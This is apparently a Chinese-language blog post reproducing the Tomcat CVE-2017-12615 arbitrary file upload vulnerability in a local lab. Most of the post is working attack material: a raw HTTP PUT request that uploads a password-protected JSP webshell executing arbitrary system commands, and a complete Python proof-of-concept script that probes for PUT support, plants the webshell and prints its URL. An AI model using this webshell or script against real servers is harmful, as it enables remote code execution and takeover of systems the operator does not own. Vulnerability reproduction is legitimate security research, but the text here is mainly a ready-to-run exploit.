Tomcat任意文件上传漏洞CVE-2017-12615复现测试

今天爆出了一个tomcat7的任意文件上传漏洞，看了大牛们的分析后，我自己本地搭建环境复测。

漏洞影响的tomcat版本为tomcat7.0.0-7.0.81版本

我本地下载的是tomcat7.0.56版本测试

测试过程：

1.下载tomcat7.0.0-7.0.81版本，解压后修改conf/web.xml文件添加readonly参数，属性值为false

如图：

然后启动tomcat

2.上传webshell

使用burpsuite发送构造的的webshell

内容如下：

PUT /123.jsp/ HTTP/1.1
Host: 192.168.23.209:8080
User-Agent:  JNTASS
DNT:1
Connection: close
Content-Length: 664

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("
"+excuteCmd(request.getParameter("cmd"))+"
");}else{out.println(":-)");}%>

这个是大牛的python POC脚本

#! -*- coding:utf-8 -*- 
import httplib
import sys
import time
body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("
"+excuteCmd(request.getParameter("cmd"))+"
");}else{out.println(":-)");}%>'''
try:
    conn = httplib.HTTPConnection(sys.argv[1])
    conn.request(method='OPTIONS', url='/ffffzz')
    headers = dict(conn.getresponse().getheaders())
    if 'allow' in headers and \
       headers['allow'].find('PUT') > 0 :
        conn.close()
        conn = httplib.HTTPConnection(sys.argv[1])
        url = "/" + str(int(time.time()))+'.jsp/'
        #url = "/" + str(int(time.time()))+'.jsp::$DATA'
        conn.request( method='PUT', url= url, body=body)
        res = conn.getresponse()
        if res.status  == 201 :
            #print 'shell:', 'http://' + sys.argv[1] + url[:-7]
            print 'shell:', 'http://' + sys.argv[1] + url[:-1]
        elif res.status == 204 :
            print 'file exists'
        else:
            print 'error'
        conn.close()
    else:
        print 'Server not vulnerable'
        
except Exception,e:
    print 'Error:', e